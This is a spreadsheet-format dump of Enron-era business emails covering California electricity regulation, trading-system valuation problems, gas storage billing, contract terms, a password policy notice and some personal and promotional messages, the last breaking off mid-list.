X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200_x000D_
X-Mozilla-Status2: 00000000_x000D_
_x000D_
_x000D_
_x000D_
Hertzberg Press Conference Announcing New  FERC Filing_x000D_
_x000D_
Speaker Hertzberg began by announcing that he had  received word that the 9=_x000D_
th=20_x000D_
Circuit Court of Appeals had rejected the  suit filed by Sen. John Burton a=_x000D_
nd=20_x000D_
the Speaker asking FERC to impose price caps.  A story from KFWB radio in L=_x000D_
A=20_x000D_
said that the 3-0 decision was that the issue  "does not warrant interventi=_x000D_
on=20_x000D_
of this court."=20_x000D_
_x000D_
The Speaker had received notice just moments before  entering the press=20_x000D_
conference and had no further details, nor had he talked to  lead counsel o=_x000D_
n=20_x000D_
the case._x000D_
_x000D_
Today=01,s announcement was regarding a request for  rehearing of FERC=01,s=_x000D_
 April=20_x000D_
26 order. He said the genesis for the request came  from discussions that=_x000D_
=20_x000D_
occurred during his trip to DC following the order. Both  sides of the aisl=_x000D_
e,=20_x000D_
he said, indicated that there were opportunities to address  what he said=_x000D_
=20_x000D_
were errors in the original order._x000D_
_x000D_
Speaker pro Tem Fred Keeley said these errors  included:_x000D_
_x000D_
The April 26 order finds that wholesale electric  rates will not be just an=_x000D_
d=20_x000D_
reasonable absent commission intervention, but the  commission does not=20_x000D_
demonstrate that the price mitigation it orders will  ensure just and=20_x000D_
reasonable rates;_x000D_
Limiting price mitigation to system emergencies  rather than on a 24/7 basi=_x000D_
s;_x000D_
Prices were pegged to the oldest, dirtiest and  costliest plants, which=20_x000D_
continues to allow inappropriately high wholesale  prices;_x000D_
There is no relation between costs and  pricing;_x000D_
Tying price mitigation to establishing a Regional  Transmission Organizatio=_x000D_
n._x000D_
_x000D_
This is a request for a "different type" of order  that they characterized =_x000D_
as=20_x000D_
"middle ground" with a "market approach" rather than  another request for=_x000D_
=20_x000D_
price caps. He did not elaborate on how the filing takes a  market-based=20_x000D_
approach since it asks for intervention by FERC, but said FERC  commissione=_x000D_
rs=20_x000D_
had indicated that this would be a more "palatable" approach.  Hertzberg=20_x000D_
added that he had met with Republicans in the House dining room and  told=_x000D_
=20_x000D_
them he was not proposing price caps._x000D_
_x000D_
Keeley said the April 26 order was a "toothless  tiger" that didn=01,t impl=_x000D_
ement=20_x000D_
penalties for violation. The request for rehearing  asks for 100% penalties=_x000D_
=20_x000D_
for any violations._x000D_
_x000D_
A copy of the filing and press release have been  forwarded to Houston and=_x000D_
=20_x000D_
are also available by contacting Scott  Govenar.</t>
  </si>
  <si>
    <t>Enpower</t>
  </si>
  <si>
    <t xml:space="preserve">In cleaning up e:mails, I ran across this one that I had not yet read.  Has _x000D_
James called and talke with you about Enpower?  Are his concerns in the memo _x000D_
accurate?  Let me know.  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 12/11/2000 11:03 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Fernley Dyson_x000D_
11/29/2000 02:54 AM_x000D_
To: Richard Causey/Corp/Enron@ENRON, Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Enpower_x000D_
_x000D_
Just a heads-up - a long-winded email, but please see highlighted paragraphs. _x000D_
I find it hard to believe the scenario portrayed here, but stranger things _x000D_
have happened - will keep you posted._x000D_
---------------------- Forwarded by Fernley Dyson/LON/ECT on 29/11/2000 08:44 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
James New_x000D_
28/11/2000 13:42_x000D_
To: Ted Murphy/HOU/ECT@ECT, David Port/Market Risk/Corp/Enron@ENRON_x000D_
cc: Mike Jordan/LON/ECT@ECT, Coralie Evans/LON/ECT@ECT, Fernley _x000D_
Dyson/LON/ECT@ECT _x000D_
_x000D_
Subject: Status update on the issues surrounding Continental Power _x000D_
volatilities and correlations_x000D_
_x000D_
As you know for some time we have been trying to get the Continental Power _x000D_
traders to increase the volatilities they use for valuing their option _x000D_
portfolio and for use in calculating their VAR as it has been obvious that _x000D_
the market  has become more volatile but this was not being reflected in _x000D_
their mark._x000D_
_x000D_
In looking at the impacts of this, various other issues came to light. _x000D_
Firstly it raised issues over the correlation matrix used in the VAR model as _x000D_
this was way out of date. We have worked with Jitendra and have now put in a _x000D_
matrix that both the traders, risk and RAC are happy with. Secondly, as you _x000D_
may be aware, in Portcalc swaptions currently use the volatility input on the _x000D_
deal ticket and not off any volatility curve. _x000D_
_x000D_
The current portfolio is 90% swaptions and so this represents a serious issue _x000D_
for us in that it is not practical to manually change all the volatilities at _x000D_
the deal ticket level every time the implied voaltilities change. We cannot _x000D_
use the option functionality as this only values hourly or daily exercise _x000D_
options and not fixed expiry swaptions or options. We also have not found any _x000D_
way in Portcalc of valuing Asian options so we are having to 'force' in the _x000D_
few we have. We have had the Houston based Portcalc IT team work on a 'new' _x000D_
piece of swaption valuation code but currently it contains a number of _x000D_
worrying bugs. These are primarily that the proposed code does not take the _x000D_
correct underlying forward price and uses the volatility of (approximating) _x000D_
the last day of the underlying rather than the implied volatility of the  _x000D_
underlying. _x000D_
_x000D_
They are currently being hampered in that they do not have any IT personnel _x000D_
who have sufficient option knowledge (I understand that the two most _x000D_
experienced coders resigned to go to another Houston based energy company). _x000D_
This is extremely worrying and I find it hard to believe that the whole of _x000D_
Enron's power business is having to use the methodology of inputting the _x000D_
volatility at the deal ticket level. This will almost certainly mean that _x000D_
different volatilities are being used in the VAR as are being used to value _x000D_
the swaption portfolio globally. As well as these issues we have concerns _x000D_
over the use and accuracy of the smile adjustment in Portcalc (worryingly it _x000D_
does not seem that you can 'switch' this off). Briefly it seems that Portcalc _x000D_
calculates the delta used to adjust the volatility by comparing the strike _x000D_
price to the forward price of the last day of the underlying rather than the _x000D_
forward price of the underlying itself. _x000D_
_x000D_
We have engaged London based  IT and are looking at the code we have used in _x000D_
Power 99 to se if there is a way we can get something done quickly to start _x000D_
to value all option products off a curve and to be able to book Asian options._x000D_
_x000D_
Once we get the above resolved we still have no way or extracting the vega or _x000D_
gamma risk from Portcalc in it's current state as the information is just no _x000D_
there (so we are told by IT). The system 'seems' (we cannot be 100% sure _x000D_
given all the other errors) to produce a vega and gamma P&amp;L number but what _x000D_
the risk is remains a mystery. Again this is very worrying in that we have _x000D_
Power option traders all over the world who can't get their underlying vega _x000D_
or gamma risk position from the global valuation system. We are trying to _x000D_
work on something manual to draw a line in the sand but I would really like _x000D_
to know how the American based traders cope as they have this problem _x000D_
(knowingly or not)  for years. What sign offs were gained for the _x000D_
implementation of Enpower because it seems to us that using the current _x000D_
system it is not possible to comply with the Global Risk policy. How do we _x000D_
validate the inputs to the valuation if we do not know the risk ?_x000D_
_x000D_
Despite the above we have now persuaded the traders to save out newer higher _x000D_
volatilities a week ago and you should have seen a large move up in their _x000D_
VAR. However, as it stands at the moment they are notable to save out a daily _x000D_
remark as Jitendra is saying that he is not happy with their 'model' / vol _x000D_
curve generator (I have today asked for a full explanation, details of any _x000D_
testing etc etc and time lines so we can move to getting over this hurdle). _x000D_
The swaptions have also not yet had the ticket volatility changed but the _x000D_
impacts are expected to be positive as we are long volatility._x000D_
_x000D_
I would appreciate your comments on the above as it seems that we are pushing _x000D_
the boundaries here on areas which we really expect to have already been _x000D_
covered in Houston some time ago and could do with some help. We are having _x000D_
to use a system which seems to us to have numerous bugs and short comings and _x000D_
are having to spend an enormous amount of IT time overcoming the inadequacies _x000D_
of Enpower wich I do not think most people are aware of. Consequently we have _x000D_
not been able to deliver all the improvements we were required to do in _x000D_
gaining the increased limits so 3 months ago but I would hope you agree that _x000D_
it is not for a lack of trying._x000D_
_x000D_
Sorry it's so long but if there are any questions or any perceived _x000D_
inaccuracies in any of the above then please let me know._x000D_
_x000D_
James_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 06:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>http://www-path.eecs.berkeley.edu:80/~ucenergy/PDFDown.html</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 01:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>for future revisions</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Elizabeth Sager/HOU/ECT on 08/08/2000 08:43 AM -----_x000D_
_x000D_
	Mike Curry_x000D_
	08/07/2000 11:35 AM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: wind_x000D_
_x000D_
Here are the latest drafts, my comments to them to follow.  - Mike_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Aug 1997 04:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Lunch Break - You are speaking in 50M Dining Room.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Per Mary Clark x37325</t>
  </si>
  <si>
    <t>Fri, 25 Aug 2000 01:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Theoretical Storage</t>
  </si>
  <si>
    <t>So you are using the current month's capacity times the cumulative theoretical_x000D_
% to determine the total storage volume to date. In that case, have you_x000D_
credited CES each month for an overcharge of gas for each previous month? If_x000D_
you are doing that and plan to for the next 8 months, let me know and I will_x000D_
adjust my numbers, but that has got to be an accounting nightmare._x000D_
I propose each month's volume is THAT months storage capacity times the_x000D_
percentage. There is no retro adjustment needed plus it is easier to stay_x000D_
within ratchets. See attached spreadsheet for difference in numbers for EES. (_x000D_
I am out of town and cannot get into my files, so the capacity numbers are a_x000D_
bit off, but it explains the concept)._x000D_
Simply, can you agree on my numbers from below for the sale to NPC? If you _x000D_
have_x000D_
been adjusting each month and want to keep it that way, OK. You will just have_x000D_
to get the billing straight with Doug. Let me know._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Scott.Goodell@enron.com on 08/23/2000 03:20:16 PM_x000D_
Please respond to Scott.Goodell@enron.com_x000D_
_x000D_
To: Jeffrey Porter/CES/ColumbiaGas@COLUMBIAGAS_x000D_
cc: Chris.Germany@enron.com, Doug Kinney/CES/ColumbiaGas@COLUMBIAGAS_x000D_
Subject: Re: Theoretical Storage_x000D_
_x000D_
_x000D_
Here are the theoretical storage volumes based on the schedule, not noms..._x000D_
          MSQ       schd  Theoretical Balance_x000D_
(Embedded image moved to file: pic10344.pcx)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
jporte1@columbiaenergygroup.com on 08/23/2000 01:27:23 PM_x000D_
_x000D_
To:   " - *Kinney, Doug" &lt;BLOCK@columbiaenergygroup.com&gt;, " -_x000D_
      *Scott.Goodell@enron.com" &lt;Scott.Goodell@enron.com&gt;, " -_x000D_
      *Chris.Germany@enron.com" &lt;Chris.Germany@enron.com&gt;_x000D_
cc:_x000D_
_x000D_
Subject:  Theoretical Storage_x000D_
_x000D_
_x000D_
We need to reach an agreement on the theoretical storage as CES needs to_x000D_
transfer to NPC a specific volume and price for COH, and AGL ESS, WSS and_x000D_
Sonat. I had thought we had an understanding that CES would be billed, per_x000D_
Melissa's memo of 3/15 and conversations during June, the percentages times_x000D_
the_x000D_
current month's storage capacity. We may have confused you by sending FOM_x000D_
noms_x000D_
for storage injections that were different than that formula, and Doug has_x000D_
noticed the bills from ENA tend to represent the noms._x000D_
_x000D_
How should this be resolved? Should we go on ENA billed volumes or by the_x000D_
formula? Let me know._x000D_
My calculations per the formula would give us the following balances for_x000D_
7/31/00..._x000D_
COH-4,053,906_x000D_
AGL-Sonat- 504,379_x000D_
AGL-ESS-9,827_x000D_
AGL-WSS-220,209_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - pic10344.pcx_x000D_
 - sto formula.xls</t>
  </si>
  <si>
    <t>Fri, 29 Jun 2001 15:17:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: PRC-Response required by end of day FRIDAY, JUNE 29</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Slone, Jeanie  _x000D_
Sent:	Tuesday, June 26, 2001 5:42 PM_x000D_
To:	Allen, Phillip K.; Arnold, John; Breslau, Craig; Fox, Craig A.; Gomez, Julie A.; Grigsby, Mike; Josey, Scott; Keel, Allan; Lagrasta, Fred; Luce, Laura; McMichael Jr., Ed; Melendrez, Jesus; Mrha, Jean; Muhl, Gil; Neal, Scott; Redmond, Brian; Shively, Hunter S.; Tycholiz, Barry; Vickers, Frank W.; Whitt, Mark; Martin, Thomas A.; Schwieger, Jim; Thompson, C. John_x000D_
Subject:	PRC-Response required by end of day FRIDAY, JUNE 29_x000D_
Importance:	High_x000D_
_x000D_
Louise Kitchen/John Lavorato have requested that each of you prepare a brief one page summary highlighting your accomplishments for this review period by end of day Friday, June 29, 2001.  _x000D_
_x000D_
You may use the PEP system and do a self-evaluation (let me know if you need assistance w/this) or send me an email bullet pointing your accomplishments.  If you have already done a self-eval, you do not need to respond to this email.  HR is compiling the information for OOTC and I appreciate your assistance/timely response.  I apologize for the quick turn around-just got the request myself._x000D_
_x000D_
Please call or email w/any questions.  Thanks._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Tue, 8 May 2001 08:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.johnson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.shankman@enron.com', 'brent.price@enron.com', 'kevin.mcgowan@enron.com', 'beth.perlman@enron.com', 'mike.mcconnell@enron.com', 'john.nowlan@enron.com'})</t>
  </si>
  <si>
    <t>FW: Thunderball /  Position Manager Release Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">This summarizes the near term delivery milestones for the Position Manager _x000D_
functionality within Thunderball.  _x000D_
_x000D_
The first release of  Position Manager    ( Phase I )  within the Thunderball _x000D_
Moneypenny application is as follows for Liquids, Crude, Products and Coal  :_x000D_
_x000D_
? Houston  UAT  (User Acceptance Test)  -- Week of May 7 through week of May _x000D_
14 . User acceptance test started today and is going well. _x000D_
 _x000D_
? London UAT    (User Acceptance Test)    -- Week of May 14 through May 21_x000D_
_x000D_
? Singapore UAT  (User Acceptance Test)      -- Week of May 21_x000D_
_x000D_
Phase I full release will be complete by May 31 (all trader desktops)_x000D_
The target is to deliver the following Phase 1 and Phase 2 functionality _x000D_
through the May / June time frame in a series of iterative releases.  _x000D_
_x000D_
Phase I includes (Liquids, Crude, Products, Coal) : _x000D_
_x000D_
? Option Specific Views_x000D_
? Spread Option Position (although not real-time updates)_x000D_
_x000D_
Phase II Includes:_x000D_
_x000D_
? User configured total columns/rows_x000D_
? Counterparty filter_x000D_
? Notional/Exposure calc toggle_x000D_
? More meaningful labels for curves_x000D_
? Geographical grouping of curve codes_x000D_
? Predictive roll off_x000D_
*with option to incorporate into current position_x000D_
? Volumetric trading limits_x000D_
? Roll risk_x000D_
_x000D_
As an FYI -- We are in the process of developing a management level view of _x000D_
all EGM delivery expectations and plans for the next 12 months. This will be _x000D_
ready by the end of this month. We will also be developing a weekly report _x000D_
that will summarize status against planned milestones for Thunderball.  _x000D_
Eventually this will be published for the other key projects that we will be _x000D_
starting for EGM.    _x000D_
_x000D_
Let me know if you have questions or concerns. </t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 12:52:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christine.meloro@newpower.com'})</t>
  </si>
  <si>
    <t>TX SET Agenda - Meeting 2/12</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the agenda as well as the documentation for the TX SET meeting_x000D_
on 2/12 at the Comfort Suites (directly across the parking lot from the_x000D_
ERCOT MET Center).  The meeting will begin promptly at 9:30 AM and will_x000D_
adjourn at 4:00 PM - we have an extremely robust agenda so plan your travel_x000D_
accordingly.  Please RSVP by COB Friday (2/8), to Christine Meloro_x000D_
(cmeloro@newpower.com) as well as Terri Waggoner (twaggoner@ercot.com)._x000D_
Hope to see you all next Tuesday!_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Christine Meloro_x000D_
The New Power Company_x000D_
cmeloro@newpower.com_x000D_
(704) 594-1283 (Office)_x000D_
(914) 319-3682 (Mobile)_x000D_
_x000D_
_x000D_
(See attached file: TX SET Agenda_2_12_02.zip)(See attached file: 814_28_x000D_
and 814_29redlines for review.zip)(See attached file: SCRs for Version_x000D_
1.5.zip)(See attached file: Version 1.5latest.zip)(See attached file: TX_x000D_
SET PROCEDURES_FINAL20010710.zip)_x000D_
 - TX SET Agenda_2_12_02.zip _x000D_
 - 814_28 and 814_29redlines for review.zip _x000D_
 - SCRs for Version 1.5.zip _x000D_
 - Version 1.5latest.zip _x000D_
 - TX SET PROCEDURES_FINAL20010710.zip </t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 09:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'cwpfister@cps-satx.com'})</t>
  </si>
  <si>
    <t>Re: FW: FW: FW: Enfolio Contract with CPS</t>
  </si>
  <si>
    <t xml:space="preserve">Christian,_x000D_
 I received your email when I got back this morning.  Yes I had a great _x000D_
holiday.  Hopefully yours was the same.  Our Credit group has agreed to _x000D_
changing the collateral threshold from 10MM to 15MM for both parties.  Please _x000D_
make that change in the contract in section 4.5 in each of the places where _x000D_
10MM is located, print 2 originals of each, have them signed, and forward to _x000D_
me for further handling with Enron North America Corp.  _x000D_
_x000D_
_x000D_
_x000D_
	"Pfister, Christian W." &lt;CWPfister@cps-satx.com&gt;_x000D_
	01/02/2001 11:31 AM_x000D_
		 _x000D_
		 To: "'Dan.J.Hyvl@enron.com'" &lt;Dan.J.Hyvl@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: FW: FW: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
Mr. Hyvl,_x000D_
_x000D_
Happy New Year!  Hope you enjoyed the holidays.  Did you have a chance to_x000D_
see if we could raise the threshold of $10 million for a Letter of Credit?_x000D_
(see message below)_x000D_
_x000D_
-----Original Message-----_x000D_
From: Pfister, Christian W._x000D_
Sent: Monday, December 18, 2000 1:58 PM_x000D_
To: 'Dan.J.Hyvl@enron.com'_x000D_
Subject: RE: FW: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
I agree.  The Accounting Dept. informed me that there are two days that_x000D_
sometimes land on the 25th that CPS considers a holiday.  One is the day_x000D_
after Thanksgiving and the other is during Fiesta for the Battle of Flowers_x000D_
Parade.  I requested that they just pay a day early if the 25th lands on one_x000D_
of these CPS holidays._x000D_
_x000D_
I have one more request, however.  In 4.5. Collateral_x000D_
Requirement/Termination Payment Threshold, could you raise the threshold of_x000D_
$10 million for a Letter of Credit to $15 or $20 million (whatever you feel_x000D_
comforable with)?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Friday, December 15, 2000 5:57 PM_x000D_
To: CWPfister@cps-satx.com_x000D_
Cc: Janet.H.Wallis@enron.com_x000D_
Subject: Re: FW: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
_x000D_
Christian,_x000D_
     I believe this is covered because the language states that if the 25th_x000D_
is not a_x000D_
Business Day, the payment will be due the next Business Day.  Business Day_x000D_
is a defined term as a day when the Federal Reserve Banks is New York are_x000D_
open for business.  I cannot agree to a Customer's Business Day because it_x000D_
is not a defined term and may differ from the standard definition of_x000D_
Business Day.  Therefore that change should not be incorporated.  Do you_x000D_
agree?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Pfister,_x000D_
_x000D_
                    Christian W."         To:     "'Dan.J.Hyvl@enron.com'"_x000D_
_x000D_
                    &lt;CWPfister@cps        &lt;Dan.J.Hyvl@enron.com&gt;_x000D_
_x000D_
                    -satx.com&gt;            cc:_x000D_
_x000D_
                                          Subject:     FW: FW: Enfolio_x000D_
Contract with CPS_x000D_
                    12/15/2000_x000D_
_x000D_
                    05:48 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mr. Hyvl,_x000D_
_x000D_
There was one change that you did not make that I requested.  It was_x000D_
difficult to tell since only a single word was bolded._x000D_
_x000D_
APPENDIX "1"  FINANCIAL MATTERS  BILLING, INVOICE DATE, CHARGES AND PAYMENT_x000D_
_x000D_
"Buyer shall remit any amounts due on the 25th day of the Month in which_x000D_
Seller's statement was received.  If the due date for any payment to be_x000D_
made_x000D_
under this Agreement is not a Customer's Business Day, the due date for_x000D_
such_x000D_
payment shall be the following Customer's Business Day."_x000D_
_x000D_
There are very few instances where our Business Day would be different from_x000D_
your business day.  However, as an example, the day after Thanksgiving is a_x000D_
CPS holiday.  This year, we had a gas payment due on that date which we_x000D_
sent_x000D_
on the following Monday.  This is probably the only holiday CPS has that_x000D_
your company may not have._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Friday, December 15, 2000 4:57 PM_x000D_
To: CWPfister@cps-satx.com_x000D_
Subject: RE: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
_x000D_
Christian,_x000D_
     Attached is the modified contract with the changes you requested._x000D_
Please print off 2 originals and have them signed.  Please fill in the_x000D_
purchase order number information on the invoices section of Exhibit A.  If_x000D_
the number is not available, them please delete the information requiring_x000D_
the number from the billing and payment provision.  Forward the signed_x000D_
copies to me or Janet Wallis and we will proceed with execution by ENA._x000D_
(See attached file: CITYPublicServiceSanAntonio.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    "Pfister,_x000D_
_x000D_
                    Christian W."         To:     "'Dan.J.Hyvl@enron.com'"_x000D_
_x000D_
                    &lt;CWPfister@cps        &lt;Dan.J.Hyvl@enron.com&gt;_x000D_
_x000D_
                    -satx.com&gt;            cc:_x000D_
_x000D_
                                          Subject:     RE: FW: Enfolio_x000D_
Contract with CPS_x000D_
                    12/15/2000_x000D_
_x000D_
                    04:16 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Unfortunately, we don't have a purchase order issued yet so I can't give_x000D_
you_x000D_
a number.  I know that would make it easier for you guys, but I don't think_x000D_
we can issue one until right before the first gas purchase.  First, a_x000D_
purchase requisition needs to be issued.  Then, a purchase order will be_x000D_
released following approvals by the various individuals authorized to sign_x000D_
off on them._x000D_
_x000D_
-----Original Message-----_x000D_
From: Dan.J.Hyvl@enron.com [mailto:Dan.J.Hyvl@enron.com]_x000D_
Sent: Friday, December 15, 2000 4:13 PM_x000D_
To: CWPfister@cps-satx.com_x000D_
Cc: Janet.H.Wallis@enron.com_x000D_
Subject: RE: FW: Enfolio Contract with CPS_x000D_
_x000D_
_x000D_
_x000D_
Christian,_x000D_
     If the purchase order number will be the same for all deals under the_x000D_
contract, can you give me the number so that I can include it as a part of_x000D_
your address for Invoices._x000D_
_x000D_
_x000D_
_x000D_
(See attached file: CITYPublicServiceSanAntonio.doc)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 12:54:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'jonathan.mckay@enron.com', 'robert.superty@enron.com', 'jared.kaiser@enron.com', 'frank.vickers@enron.com', 'scott.goodell@enron.com', 'judy.townsend@enron.com', 'scott.neal@enron.com', 'andrea.ring@enron.com', 'victor.lamadrid@enron.com', 'chris.ordway@enron.com', 'meredith.homco@enron.com', 'f..brawner@enron.com', 'craig.taylor@enron.com', 'clarissa.garcia@enron.com', 'chuck.ames@enron.com'})</t>
  </si>
  <si>
    <t>Business Planning Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Please plan to attend a meeting on Monday, February 4th at 10:30 a.m.  The meeting will take place in conference room ECS06990._x000D_
_x000D_
Thank you, _x000D_
_x000D_
Amanda Rybarski_x000D_
Office: (713) 853-4384_x000D_
Fax: (713) 646-3564_x000D_
Cell: (713) 560-0934_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 11:33:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>Entergy PTB</t>
  </si>
  <si>
    <t>Kevin,_x000D_
_x000D_
I spoke with the lawyer representing Entergy, and he indicated that their intention is to provide redacted bid information to the PUC under a protective order.  Excluded from their submittal will be any identifying information about each of the bidders. Their lawyer said that Enron's bid sheet (without identifying info) and contract comments (with no identifying info) would be submitted. Obviously, pricing info will be included.  In order to acquire the filed information, someone must qualify as a "Party" and must agree to be bound by the terms of the protective order.  Heather tells me Christi Nicolay was looking into the definition of "Party".  I do not know if our competitors could qualify as Parties, but if they do, then common sense tells me that we should, too. At this point we should assume that they will get the redacted information._x000D_
_x000D_
Seems like Entergy is doing what they can to protect the info, and our only choice I can think of would be to withdraw our bid.  Heather tells me we want to go forward._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Sat, 3 Jun 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'vkaminski@ol.com'})</t>
  </si>
  <si>
    <t>http://biblioteka.sieciowa.to.jest.to/index2.htm</t>
  </si>
  <si>
    <t>Wed, 21 Jun 2000 12:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'e.houston@enron.com'})</t>
  </si>
  <si>
    <t>IT Security and Standards Notice</t>
  </si>
  <si>
    <t>Information Risk Management =01) IT Security and Standards Notice_x000D_
=20_x000D_
Passwords_x000D_
The key to maintaining information and systems security is the use of=20_x000D_
well-selected and guarded passwords.  Please remember, your password is our=_x000D_
=20_x000D_
first line of defense. It is important that:_x000D_
? Your password should be unique and only known to you._x000D_
? Your password should never be shared with someone else._x000D_
? A password must never be written down (i.e. post-it notes), stored in fil=_x000D_
es=20_x000D_
on personal computers, at workstations, hidden under keyboards, configured =_x000D_
on=20_x000D_
terminal hot-keys, etc._x000D_
? Passwords must be changed every 60 days._x000D_
_x000D_
Strong password selection criteria will soon be automated for all employees=_x000D_
. =20_x000D_
For instructions on selecting a good password or to the view the company=20_x000D_
password policy and standards, click here:=20_x000D_
http://itcentral.enron.com/data/policiesandprocedures/ITPasswordScreenSaver_x000D_
_x000D_
Please keep in mind that the Enron Conduct of Business Affairs holds=20_x000D_
employees responsible for password security.  Information Risk Management=_x000D_
=20_x000D_
conducts periodic audits to ensure compliance with company policy. =20_x000D_
_x000D_
For any problems encountered concerning password controls, please call your=_x000D_
=20_x000D_
appropriate Help Desk (available: 24Hrs./day, 7 days/week).</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Opportunities at ENA</t>
  </si>
  <si>
    <t xml:space="preserve">Oh well._x000D_
_x000D_
Jeff is in London, but will be here on Monday.  _x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Carlos Sole@ENRON_DEVELOPMENT on 11/10/2000 09:16 AM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Opportunities at ENA  _x000D_
_x000D_
late March_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	11/10/2000 09:13 AM_x000D_
		_x000D_
		 To: Carlos Sole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
		 cc: _x000D_
		 Subject: Re: Opportunities at ENA_x000D_
_x000D_
I thrive on pressure.  My birthday is January 11th.  Is that close to her due _x000D_
date?_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Carlos Sole@ENRON_DEVELOPMENT on 11/09/2000 03:25 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Opportunities at ENA  _x000D_
_x000D_
Thanks.  Depending on your success as a headhunter for me, I will propose to _x000D_
Kendall that if our expectant child is a girl then she should be named _x000D_
Cynthia or Kay._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 12 Dec 2000 08:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Christmas Lists</t>
  </si>
  <si>
    <t>Thanks for your notes.  Just so you know, I have the Polo Sport perfume and a _x000D_
Victoria's Secret gift certificate for Emily.  Were there lists for you and _x000D_
Dad?  I can't seem to find them.</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 14:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Larry,_x000D_
_x000D_
Alaska cruises for $549. Free nights in Mexico. All the golf you can _x000D_
stand in Miami for $175. Sound too good to be true? Trust us, it's _x000D_
the Real Deal. Travelocity has Deals to help save you money on a wide _x000D_
variety of vacations and destinations. Plus, our brand-new Preferred _x000D_
Traveler Program can help you save even more. It's the _x000D_
ultimate upgrade! _x000D_
_x000D_
_x000D_
Featured this Week_x000D_
? Introducing the Travelocity Preferred Traveler Program Vacations_x000D_
Airlines_x000D_
? Save Big on Travel to Canada!_x000D_
? Hot Fares to Central and South America!_x000D_
? Qantas announces great fares to Australia!_x000D_
Vacations_x000D_
? $100 Disney Dollars at Walt Disney Orlando!_x000D_
? Kids Under 12 Stay FREE at All-Inclusive Resort in Cancun!_x000D_
? Visit Maui and Receive 20,000 Bonus Miles!_x000D_
Cruises_x000D_
? May Sailings from Seattle on Sale from $249!_x000D_
? Depart from New York on a 7-Night Canada and New England Cruise_x000D_
??for $429!_x000D_
? 7-Night Alaska Cruises this Spring and Summer from Only $549!_x000D_
? Save 50% on a Luxurious Windstar Mediterranean Cruise!_x000D_
Hotels_x000D_
? Luxor Las Vegas Resort and Casino_x000D_
? Great Weekend Vacation Values_x000D_
? This April, $175 Buys You Unlimited Golf at the Doralc Golf_x000D_
??Resort &amp; Spa_x000D_
Rent-A-Car_x000D_
